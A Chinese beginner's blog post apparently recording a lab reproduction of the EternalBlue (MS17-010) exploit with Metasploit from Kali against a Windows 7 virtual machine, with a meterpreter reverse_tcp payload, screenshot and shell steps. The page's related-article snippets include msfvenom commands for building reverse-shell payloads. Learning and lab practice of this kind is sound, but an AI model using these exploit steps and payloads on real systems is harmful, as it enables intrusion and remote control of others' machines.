学习网安第二天,尝试复现永恒之蓝。

最新推荐文章于 2024-06-13 09:17:31 发布
最新推荐文章于 2024-06-13 09:17:31 发布
阅读量34 收藏
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CNLTSC/article/details/131579425
版权
在Kali系统中,通过msfconsole进入Metasploit框架,搜索ms17-010漏洞并确认其存在。设置目标IP,选择相应的攻击模块,设置payload为windows/x64/meterpreter/reverse_tcp,运行攻击。成功后,执行截图、获取shell到cmd,查询目标IP地址,最后退出msfconsole。
摘要由CSDN通过智能技术生成

攻击机kali ,靶机为win7

用msfconsole 进入msf

试用search ms17-010 查找相关漏洞

Use 3 检查漏洞是否存在并使用show options 查看必要配置

输入set rhosts 192.168.1.3 设置ip地址

并run

得出可以使用ms17-010的结果

使用Use 0 攻击模块并使用show options 查看必要配置

用set rhosts 192.168.1.3 设置地址 并设置payload :set payload windows/x64/meterpreter/reverse_tcp 并run(默认也payload也是这个,重新设置只是为了加强记忆)。

 

并用screenshot 进行了截图的操作并使用help查看了相关命令

使用shell进入cmd命令行并查询ip

最后exit后并quit即可结束操作

 

CNLTSC
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[网络安全自学篇] 七十八.XSS跨站脚本攻击案例分享及总结(二)
杨秀璋的专栏
05-18 1万+
这是作者网络安全自学教程系列,主要是关于全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了肖老师(Seak)的分享,介绍恶意代码与APT攻击中的武器,包括A2PT的攻击武器、普通APT组织的自研恶意代码、商用恶意代码、无恶意代码作业、开源和免费工具等。这些天分享了很多系统全和软件全的知识,接下来让我们回归网络安全,做做XSS跨站脚本攻击案例。这些题目来自Fox好友,在此感谢他。主要内容包括XSS原理、不同类型的XSS、XSS靶场9道题目、如何防御XSS。希望您喜欢~
[网络安全自学篇] 七十七.恶意代码与APT攻击中的武器(强推Seak老师)
杨秀璋的专栏
05-14 1万+
这是作者网络安全自学教程系列,主要是关于全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了逆向分析之OllyDbg动态调试工具,包括INT3断点、反调试、硬件断点和内存断点。这篇文章将带大家学习天科技集团首席架构师肖新光老师(Seak)的分享,介绍恶意代码与APT攻击中的武器,包括A2PT的攻击武器、普通APT组织的自研恶意代码、商用恶意代码、无恶意代码作业、开源和免费工具等。作者很少会在标题写“强推”的字样,但这篇文章真的值得学习,也希望对您有所帮助。
学习路线
qq_45877696的博客
10-16 433
1.CSS的基本介绍2.CSS常用属性-盒子3.CSS样式表的基本使用4.CSS选择器-基础选择器5.CSS选择器-高级选择器6.CSS继承性和层叠性C++简述C++标准C++的应用场景第一个C++程序卓逆向有何意义卓逆向的学习路径卓逆向的发展和就业前景卓逆向基本思路需要掌握的技能点最佳实践第三方测评机构等保测评师岗位全产品服务和厂商关保:关键信息基础设施保护分保:涉及国家秘密的信息系统分级保护管理办法重保:重要时期全保障服务ISO27000体系。
黑客第二课:主机攻防演练【ms17-010永恒之蓝
资深程序员,曾自学JAVA,C#,如今从业于网安行业
01-05 1119
ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入各种恶意软件,如勒索软件。最近出现的 WannaCry 勒索软件就使用 ms17_010 漏洞来传播和植入勒索代码,将目标系统中的所有文件加密并威胁用户付款。
阿一网络安全培训学习第55天的一次真实环境下渗透的全过程
Ayixy的博客
05-20 898
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=你的 IP LPORT=你监听的端口 -f。msfvenom -p osx/x86/shell_reverse_tcp LHOST=你的 IP LPORT=你监听的端口 -f macho >msfvenom -p java/jsp_shell_reverse_tcp LHOST=你的 IP LPORT=你监听的端口 -f raw >
为什么学网网络安全真的算是近些年前景很不错的IT领域
2402_84205067的博客
06-13 633
下面给大家总结了一套适用于网零基础的学习路线,应届生和转行人员都适用,学完保底6k!就算你底子差,如果能趁着网良好的发展势头不断学习,日后跳槽大厂、拿到百万年薪也不是不可能!网络安全产业就像一个江湖,各色人等聚集。
2021年总结:缘起性空,归来不少年——回顾这荆棘的一年
热门推荐
杨秀璋的专栏
01-05 3万+
2021年已经离去,感谢大家的陪伴和帮助,感谢家人的鼓励。转眼,这已是我在CSDN写下的第九篇年终总结,真是岁月如梭。《缘起性空,归来不少年》。是啊,归来不再少年,我已经是而立之年了。当我写下这几个字的时候,心里还沉甸甸的。曾经的我总以为,博士毕业继续回到贵州教书,陪伴家人,仍是少年,真的如此吗?或许现实将更加残忍,岁月将不饶人,这荆棘一年让我意识到,我已为人父,不再少年。
视频教程-Kali Linux渗透测试基础入门到进阶实战全程课-渗透测试
weixin_33604152的博客
05-28 3021
Kali Linux渗透测试基础入门到进阶实战全程课 本人有多年的服务器高级...
视频教程-Kali Linux渗透测试全程课与脚本语言编程系列课程-渗透测试
weixin_33606760的博客
05-28 890
Kali Linux渗透测试全程课与脚本语言编程系列课程 本人有多年的服务器...
0x20.第二十课 MetaSploit检测并复现永恒之蓝.pdf
06-24
### MetaSploit检测并复现永恒之蓝 #### 概述 本课程主要介绍如何使用MetaSploit框架来检测和复现著名的“永恒之蓝”(EternalBlue)漏洞。该漏洞是微软在2017年发布的MS17-010全更新中修复的一个严重漏洞。该...
[系统全] 二十五.WannaCry勒索病毒分析 (1)Python复现永恒之蓝漏洞实现勒索加密
杨秀璋的专栏
02-27 1万+
作者前文介绍了逆向分析之OllyDbg动态调试工具,包括INT3断点、反调试、硬件断点和内存断点。这篇文章将分享新知识,最近WannaRen勒索软件爆发(下图是天的分析攻击流程),其名称和功能与WannaCry相似,所以接下来作者将连续分享WannaCry勒索病毒的复现及分析,第一篇文章将采用Github资源实现永恒之蓝漏洞利用及Windows7系统文件加密。希望这系列文章对您有所帮助,漫漫长征路,偏向虎山行。享受过程,一起加油~
浅记一次在kali中复现永恒之蓝
qq_64410217的博客
08-14 657
一名刚入坑的网小白的简要学习分享
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8429
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
华为智慧城市成功案例集
08-29
华为智慧城市成功案例集
小程序-仁怀酱酒宝:酒类商城模板(源码).zip
最新发布
08-29
小程序-仁怀酱酒宝:酒类商城模板(源码).zip
剑雅真题G类雅思官方指南OG剑雅真题G类雅思官方指南OG
08-29
剑雅真题G类雅思官方指南OG剑雅真题G类雅思官方指南OG提取方式是百度网盘分享地址
基于微信小程序的点餐系统的设计设计与实现.docx
08-29
基于微信小程序的点餐系统的设计设计与实现.docx
使用MSF复现永恒之蓝
11-27
为了使用MSF复现永恒之蓝漏洞,可以按照以下步骤进行操作: 1. 打开终端并启动msfconsole,输入以下命令: ```shell msfconsole ``` 2. 在msfconsole中,使用search命令搜索ms17-010漏洞: ```shell search ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值